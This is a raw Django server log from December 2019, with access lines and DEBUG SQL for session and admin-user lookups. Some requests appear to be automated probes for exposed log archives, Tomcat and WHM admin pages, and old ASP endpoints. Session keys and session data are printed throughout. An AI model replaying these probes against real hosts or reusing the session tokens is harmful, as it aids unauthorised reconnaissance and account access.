0 [09/Dec/2019 15:25:13] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:30:16] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:35:19] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:40:22] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:45:24] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:50:27] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:55:30] "GET / HTTP/1.0" 302 0 Not Found: /index.php [09/Dec/2019 15:55:48] "GET /index.php HTTP/1.0" 404 6620 [09/Dec/2019 16:01:21] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:10:04] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:15:07] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:20:10] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:25:12] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:30:15] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:35:18] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:35:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 16:40:06,846 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a2mp14srg9cph7nqkmt85859lltlhz6m' LIMIT 1; args=('a2mp14srg9cph7nqkmt85859lltlhz6m',) DEBUG 2019-12-09 16:40:06,849 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a2mp14srg9cph7nqkmt85859lltlhz6m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T16:40:06.847801+00:00'::timestamptz); args=('a2mp14srg9cph7nqkmt85859lltlhz6m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 16, 40, 6, 847801, tzinfo=)) [09/Dec/2019 16:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 16:40:18] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:45:43] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:52:56] "GET / HTTP/1.0" 302 0 [09/Dec/2019 16:57:58] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 Not Found: /error.log [09/Dec/2019 17:07:33] "GET /error.log HTTP/1.0" 404 6621 Not Found: /manager/html [09/Dec/2019 17:09:18] "GET /manager/html HTTP/1.0" 404 6629 [09/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [09/Dec/2019 17:13:05] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [09/Dec/2019 17:13:07] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=105 HTTP/1.0" 404 6705 Not Found: /newslist.asp [09/Dec/2019 17:13:08] "GET /newslist.asp?type=4&id=1292 HTTP/1.0" 404 6649 [09/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:19:55] "GET /?C=S;O=A HTTP/1.0" 302 0 [09/Dec/2019 17:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:28:31] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:33:33] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:38:36] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:43:39] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:48:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 17:56:59] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:03:37] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:10:04] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:16:30] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:19:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 18:19:54,961 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7sbupyoehikt552n8is71vuhkyn8etek' LIMIT 1; args=('7sbupyoehikt552n8is71vuhkyn8etek',) DEBUG 2019-12-09 18:19:54,962 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7sbupyoehikt552n8is71vuhkyn8etek', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T18:19:54.961520+00:00'::timestamptz); args=('7sbupyoehikt552n8is71vuhkyn8etek', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 18, 19, 54, 961520, tzinfo=)) [09/Dec/2019 18:19:54] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 18:21:33] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:26:36] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:31:38] "GET / HTTP/1.0" 302 0 Not Found: /admin.resfx.com/ [09/Dec/2019 18:31:59] "GET /admin.resfx.com/ HTTP/1.0" 404 6642 [09/Dec/2019 18:36:41] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:38:16] "GET /?C=M;O=A HTTP/1.0" 302 0 [09/Dec/2019 18:41:44] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:46:46] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:51:49] "GET / HTTP/1.0" 302 0 [09/Dec/2019 18:55:39] "GET /?C=D;O=A HTTP/1.0" 302 0 [09/Dec/2019 18:56:52] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:30:16] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:35:19] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:36:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 19:36:28,954 utils 32196 139885050582784 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f973k4utu6lqtadm51nek7e3ewjhxg87' LIMIT 1; args=('f973k4utu6lqtadm51nek7e3ewjhxg87',) DEBUG 2019-12-09 19:36:28,957 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f973k4utu6lqtadm51nek7e3ewjhxg87', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T19:36:28.955306+00:00'::timestamptz); args=('f973k4utu6lqtadm51nek7e3ewjhxg87', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 19, 36, 28, 955306, tzinfo=)) [09/Dec/2019 19:36:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 19:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 19:40:06,706 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kkxs07s0yzgo6gywxz72el2qf7ok8psw' LIMIT 1; args=('kkxs07s0yzgo6gywxz72el2qf7ok8psw',) DEBUG 2019-12-09 19:40:06,708 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kkxs07s0yzgo6gywxz72el2qf7ok8psw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T19:40:06.707056+00:00'::timestamptz); args=('kkxs07s0yzgo6gywxz72el2qf7ok8psw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 19, 40, 6, 707056, tzinfo=)) [09/Dec/2019 19:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 19:40:22] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:45:25] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:50:27] "GET / HTTP/1.0" 302 0 [09/Dec/2019 19:55:30] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:09:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 20:09:35,578 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rh6ec5l1g4vb57f2040k9lu4r6968usf' LIMIT 1; args=('rh6ec5l1g4vb57f2040k9lu4r6968usf',) DEBUG 2019-12-09 20:09:35,582 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rh6ec5l1g4vb57f2040k9lu4r6968usf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T20:09:35.579840+00:00'::timestamptz); args=('rh6ec5l1g4vb57f2040k9lu4r6968usf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 20, 9, 35, 579840, tzinfo=)) [09/Dec/2019 20:09:35] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 20:09:35] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [09/Dec/2019 20:09:35] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [09/Dec/2019 20:09:35] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [09/Dec/2019 20:09:35] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [09/Dec/2019 20:09:36] "GET /favicon.ico HTTP/1.0" 404 6627 [09/Dec/2019 20:09:36] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [09/Dec/2019 20:09:36] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [09/Dec/2019 20:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:11:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 20:11:14,413 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu' LIMIT 1; args=('b48gehd192lvowdc93zzzq9u6exhqtnu',) DEBUG 2019-12-09 20:11:14,415 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('b48gehd192lvowdc93zzzq9u6exhqtnu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T20:11:14.414072+00:00'::timestamptz); args=('b48gehd192lvowdc93zzzq9u6exhqtnu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 20, 11, 14, 414072, tzinfo=)) [09/Dec/2019 20:11:14] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 20:11:14] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [09/Dec/2019 20:11:14] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [09/Dec/2019 20:11:14] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [09/Dec/2019 20:11:14] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [09/Dec/2019 20:11:14] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [09/Dec/2019 20:11:14] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [09/Dec/2019 20:11:14] "GET /favicon.ico HTTP/1.0" 404 6627 DEBUG 2019-12-09 20:15:04,769 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T20:15:04.755971+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 9, 20, 15, 4, 755971, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [09/Dec/2019 20:15:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 20:15:04,874 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T20:15:04.862688+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 9, 20, 15, 4, 862688, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') DEBUG 2019-12-09 20:15:04,913 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-23T20:15:04.910445+00:00'::timestamptz WHERE "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 20, 15, 4, 910445, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [09/Dec/2019 20:15:04] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:30:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:37:41] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:42:43] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:47:45] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:53:47] "GET / HTTP/1.0" 302 0 [09/Dec/2019 20:58:49] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:04:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:09:32] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 21:15:12] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:20:50] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:26:24] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:31:50] "GET / HTTP/1.0" 302 0 Not Found: /error.log-20191124.gz [09/Dec/2019 21:32:44] "GET /error.log-20191124.gz HTTP/1.0" 404 6657 [09/Dec/2019 21:38:26] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 21:41:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:43:59] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:43:59] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:46:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:51:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 21:56:10] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:20:23] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:25:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:30:17] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:35:19] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [09/Dec/2019 22:39:49] "GET /robots.txt HTTP/1.0" 404 6624 [09/Dec/2019 22:40:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 22:40:10,920 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qns3qs6579n2dxu7r2100kkvx4kbhh1i' LIMIT 1; args=('qns3qs6579n2dxu7r2100kkvx4kbhh1i',) DEBUG 2019-12-09 22:40:10,923 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qns3qs6579n2dxu7r2100kkvx4kbhh1i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T22:40:10.921171+00:00'::timestamptz); args=('qns3qs6579n2dxu7r2100kkvx4kbhh1i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 22, 40, 10, 921171, tzinfo=)) [09/Dec/2019 22:40:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 22:40:49] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:44:56] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:49:59] "GET / HTTP/1.0" 302 0 [09/Dec/2019 22:55:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:08:21] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:15:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:23:58] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:29:01] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:34:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:39:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:44:09] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:49:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:54:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 23:59:16] "GET / HTTP/1.0" 302 0 Not Found: /access.log-20191124.gz [10/Dec/2019 00:01:19] "GET /access.log-20191124.gz HTTP/1.0" 404 6660 [10/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:20:25] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:25:27] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:31:12] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:36:15] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:41:18] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:42:46] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 00:46:20] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:51:23] "GET / HTTP/1.0" 302 0 [10/Dec/2019 00:56:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 00:59:10] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [10/Dec/2019 00:59:14] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=106 HTTP/1.0" 404 6705 Not Found: /newslist.asp [10/Dec/2019 00:59:17] "GET /newslist.asp?type=4&id=1284 HTTP/1.0" 404 6649 [10/Dec/2019 01:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:17:00] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:22:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:30:58] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:36:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 01:40:06,737 utils 32196 139885061072640 (0.010) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4wkjbyobqc1uxsbhbg9ixkf1g7hst0t3' LIMIT 1; args=('4wkjbyobqc1uxsbhbg9ixkf1g7hst0t3',) DEBUG 2019-12-10 01:40:06,740 utils 32196 139885061072640 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4wkjbyobqc1uxsbhbg9ixkf1g7hst0t3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T01:40:06.738472+00:00'::timestamptz); args=('4wkjbyobqc1uxsbhbg9ixkf1g7hst0t3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 1, 40, 6, 738472, tzinfo=)) [10/Dec/2019 01:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 01:41:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:46:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 01:46:06,539 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T01:46:06.530236+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 10, 1, 46, 6, 530236, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [10/Dec/2019 01:46:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 01:46:06,651 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T01:46:06.642607+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 10, 1, 46, 6, 642607, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') DEBUG 2019-12-10 01:46:06,685 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-24T01:46:06.683076+00:00'::timestamptz WHERE "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 1, 46, 6, 683076, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [10/Dec/2019 01:46:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 01:46:13] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-10 01:46:15,194 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T01:46:15.182063+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 10, 1, 46, 15, 182063, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') DEBUG 2019-12-10 01:46:15,200 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'admin'; args=('admin',) DEBUG 2019-12-10 01:46:15,537 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-24T01:46:15.534642+00:00'::timestamptz WHERE "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 1, 46, 15, 534642, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [10/Dec/2019 01:46:15] "POST /login/?next=/ HTTP/1.0" 200 1947 DEBUG 2019-12-10 01:46:40,511 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T01:46:40.502320+00:00'::timestamptz AND "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'); args=(datetime.datetime(2019, 12, 10, 1, 46, 40, 502320, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') DEBUG 2019-12-10 01:46:40,514 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'admin'; args=('admin',) DEBUG 2019-12-10 01:46:40,763 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-24T01:46:40.761878+00:00'::timestamptz WHERE "django_session"."session_key" = 'b48gehd192lvowdc93zzzq9u6exhqtnu'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 1, 46, 40, 761878, tzinfo=), 'b48gehd192lvowdc93zzzq9u6exhqtnu') [10/Dec/2019 01:46:40] "POST /login/?next=/ HTTP/1.0" 200 1947 [10/Dec/2019 01:51:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 01:55:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 01:55:37,676 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm063l5dzsy5l70kj2hal80rregc7c1l5' LIMIT 1; args=('m063l5dzsy5l70kj2hal80rregc7c1l5',) DEBUG 2019-12-10 01:55:37,678 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m063l5dzsy5l70kj2hal80rregc7c1l5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T01:55:37.676808+00:00'::timestamptz); args=('m063l5dzsy5l70kj2hal80rregc7c1l5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 1, 55, 37, 676808, tzinfo=)) [10/Dec/2019 01:55:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 01:56:11] "GET / HTTP/1.0" 302 0 Not Found: /access.log-20191123.gz [10/Dec/2019 02:00:43] "GET /access.log-20191123.gz HTTP/1.0" 404 6660 [10/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 02:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 02:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 02:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 02:25:13] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 06:16:21] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-10 06:16:21,700 utils 32196 139885071562496 (0.013) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:16:21.669676+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 10, 6, 16, 21, 669676, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 